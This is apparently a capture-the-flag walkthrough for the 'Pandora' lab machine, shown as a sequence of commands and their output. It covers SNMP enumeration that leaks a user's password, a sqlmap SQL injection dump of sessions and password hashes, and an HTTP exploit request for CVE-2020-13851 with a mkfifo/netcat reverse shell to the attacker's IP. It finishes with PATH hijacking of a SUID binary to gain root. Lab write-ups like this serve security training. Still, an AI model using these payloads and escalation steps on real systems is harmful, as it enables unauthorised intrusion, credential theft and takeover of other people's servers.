Enum

nmap

tcp

# Nmap 7.92 scan initiated Mon Jan 10 13:15:56 2022 as: nmap -sCV -oN nmap_tcp 10.129.222.255
Nmap scan report for 10.129.222.255
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 13:16:05 2022 -- 1 IP address (1 host up) scanned in 9.74 seconds

udp

sudo nmap -sU panda.htb      
[sudo] password for bob: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 15:46 CET
Nmap scan report for panda.htb (10.129.222.255)
Host is up (0.093s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

SNMP

From the udp scan we notice that SNMP is open.

We run snmp-check with snmp-check 10.129.222.255

snmp-check v1.9 - SNMP enumerator                                                                                                                                                                                                           
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)                                                                                                                                                                                 
                                                                                                                                                                                                                                            
[+] Try to connect to 10.129.222.255:161 using SNMPv1 and community 'public'                                                                                                                                                                
                                                                                                                                                                                                                                            
[*] System information:                                                                                                                                                                                                                     
                                                                                                                                                                                                                                            
  Host IP address               : 10.129.222.255                                                                                                                                                                                            
  Hostname                      : pandora                                                                                                                                                                                                   
  Description                   : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64                                                                                                                         
  Contact                       : Daniel                                                                                                                                                                                                    
  Location                      : Mississippi                                                                                                                                                                                               
  Uptime snmp                   : 03:18:10.32                                                                                                                                                                                               
  Uptime system                 : 03:18:01.77                                                                                                                                                                                               
  System date                   : 2022-1-10 15:24:17.0                                                                                                                                                                                      
                                                                                                                                                                                                                                            
[*] Network information:                                                                                                                                                                                                                    
                                                                                                                                                                                                                                            
  IP forwarding enabled         : no                                                                                                                                                                                                        
  Default TTL                   : 64                                                                                                                                                                                                        
  TCP segments received         : 5761897                                                                                                                                                                                                   
  TCP segments sent             : 7461778                                                                                                                                                                                                   
  TCP segments retrans          : 74411                                                                                                                                                                                                     
  Input datagrams               : 5772624                                                                                                                                                                                                   
  Delivered datagrams           : 5772622                                                                                                                                                                                                   
  Output datagrams              : 5026575
  
  [...]
  
959                   runnable              sh                    /bin/sh               -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23' 

Resources

With the credentials daniel:HotelBabylon23 we are able to get access as Daniel over ssh.

We run linpeas and discover another VHOST:

lrwxrwxrwx 1 root root 31 Dec  3 12:53 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf
  ServerName pandora.panda.htb

If we look at the configuration

daniel@pandora:/var/www/pandora/pandora_console$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

We notice that the service is running on localhost which we can confirm by using curl

$ curl -H "Host: pandora.panda.htb" http://localhost                    
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

curl -H "Host: pandora.panda.htb" http://localhost/pandora_console/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

        <title>Pandora FMS - the Flexible Monitoring System</title>

[...]

We forward this port to our machine using chisel

$ ./chisel server -p 9000 --reverse
2022/01/11 08:59:53 server: Reverse tunnelling enabled
2022/01/11 08:59:53 server: Fingerprint XbzF4cXangJHcxENo4KP60XwiI8Ga7JipQZq8MIARwg=
2022/01/11 08:59:53 server: Listening on http://0.0.0.0:9000
2022/01/11 09:00:45 server: session#1: tun: proxy#R:8008=>80: Listening
daniel@pandora:~$ ./chisel client 10.10.17.142:9000 R:8008:127.0.0.1:80
2022/01/11 08:00:43 client: Connecting to ws://10.10.17.142:9000
2022/01/11 08:00:44 client: Connected (Latency 25.710601ms)

Once we have forwarded this to our local machine, we discover that the version running is which appears to be vulnerable

We learn from the blogpost that we are able to perform an SQL injection in the session_id parameter.

We use sqlmap to dump the database

sqlmap -u 'http://pandora.panda.htb:8008/pandora_console/include/chart_generator.php?session_id=1' -D pandora --tables --batch 

+----------------------------+-----------------------------------------------------+-------------+                                                                                                                                           
| id_session                 | data                                                | last_active |                                                                                                                                           
+----------------------------+-----------------------------------------------------+-------------+                                                                                                                                           
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                            | 1638783555  |                                                                                                                                           
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                | 1638789018  |                                                                                                                                           
| 1um23if7s531kqf5da14kf5lvm | NULL                                                | 1638792211  |                                                                                                                                           
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                | 1638786129  |                                                                                                                                           
| 2lbnsgqr421lpekvdf99t9bplu | NULL                                                | 1641889533  |                                                                                                                                           
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                            | 1638540332  |                                                                                                                                           
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                | 1638795380  |                                                                                                                                           
| 42hjaqrqjim176kd75bq29ridm | NULL                                                | 1641889101  |                                                                                                                                           
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                | 1638786842  |                                                                                                                                           
| 4jko4f2gtkenm1o2bvk8u7lati | NULL                                                | 1641829963  |                                                                                                                                           
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                            | 1638535373  |                                                                                                                                           
| 59qae699l0971h13qmbpqahlls | NULL                                                | 1638787305  |                                                                                                                                           
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                | 1638792685  |                                                                                                                                           
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                            | 1638281946  |                                                                                                                                           
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                            | 1641195617  |                                                                                                                                           
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                | 1623957150  |                                                                                                                                           
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                            | 1638446321  |                                                                                                                                           
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                | 1638787267  |                                                                                                                                           
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                            | 1638881787  |                                                                                                                                           
| a2u0c3mu6n5oaco13vpfk8us20 | NULL                                                | 1641888369  |                                                                                                                                           
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                | 1638795315  |                                                                                                                                           
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                            | 1638881664  |
| bbhf4mtod74tqhv50mpdvu4lj5 | id_usuario|s:6:"daniel";                            | 1641201982  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                | 1638786277  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                | 1638540345  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                            | 1638168492  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                            | 1638456173  |
| kam34ut0caka8rnvf5ekcs0gjf | NULL                                                | 1641888742  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                | 1638787808  |
| mi1eldqb65rbs7g04ctuiean0v | NULL                                                | 1641889151  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                            | 1638540482  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                            | 1637667827  |
| os7t6ongcosddnupbddqn69cnt | NULL                                                | 1641889073  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                            | 1638168416  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                            | 1638889082  |
| rlklgt45od2js55hioav906j79 | id_usuario|s:6:"daniel";                            | 1641888708  |
| rrbdk3bi4h52aab1pa9qm5d3sd | NULL                                                | 1641888750  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                            | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                            | 1638793297  |
| vcmr926652b18b69m4ibkvosj7 | id_usuario|s:6:"daniel";                            | 1641816405  |
+----------------------------+-----------------------------------------------------+-------------
Database: pandora                                                                                                                                                                                                                            
Table: tpassword_history                                                                                                                                                                                                                     
[2 entries]                                                                                                                                                                                                                                  
+---------+---------+---------------------+----------------------------------+---------------------+                                                                                                                                         
| id_pass | id_user | date_end            | password                         | date_begin          |                                                                                                                                         
+---------+---------+---------------------+----------------------------------+---------------------+                                                                                                                                         
| 1       | matt    | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |                                                                                                                                         
| 2       | daniel  | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |                                                                                                                                         
+---------+---------+---------------------+----------------------------------+---------------------+                                                                                                                                         
                                                                                                    

Searching for vulnerabilities, we find this post from CoreSecurity

[CVE-2020-13851] It is possible to abuse the Events feature to gain arbitrary command execution on the underlying operating system. The Events function allows a user to configure and execute actions (server responses) based on specific conditions reported by the agents. For instance, it is possible to leverage the mentioned feature to execute an arbitrary operating system command as the user apache in the context of the Pandora FMS server. It should be noted that low privilege (i.e. non-administrative users) can issue the following request as well.

We adjust the POC and change the reverse shell:

POST /pandora_console/ajax.php HTTP/1.1
Host: pandora.panda.htb:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Origin: http://pandora.panda.htb:8008
Connection: close
Referer: http://pandora.panda.htb:8008//pandora_console/index.php?sec=eventos&sec2=operation/events/events
Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq
page=include/ajax/events&perform_event_response=10000000

&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.17.142+9001+>/tmp/f&response_id=1

We get a shell as Matt and retrieve the user flag

matt@pandora:/home/matt$ cat user.txt
574bfb063cc88de86473a43158d75f49

We run linpeas and observe an interesting SUID

═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                                                                                                                                      
                                         ╚═══════════════════╝                                                                                                                                                                               
╔══════════╣ SUID - Check easy privesc, exploits and write perms                                                                                                                                                                             
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                                                                                                                                  
[...]                                                                                                                                                          
-rwsr-x--- 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)  

Let’s investigate this binary and what happens when we execute it

matt@pandora:/home/matt$ file /usr/bin/pandora_backup 
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/home/matt$ ltrace /usr/bin/pandora_backup
getuid()                                         = 1000
geteuid()                                        = 1000
setreuid(1000, 1000)                             = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
)                = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
)      = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)     = 39
+++ exited (status 1) +++

We observe that it is only using the relative path which we should be able to exploit with path injection.

matt@pandora:/dev/shm$ echo /bin/sh > tar
matt@pandora:/dev/shm$ chmod +x tar
matt@pandora:/dev/shm$ export PATH=`pwd`:$PATH
matt@pandora:/dev/shm$ echo  $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/dev/shm$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# whoami
root
#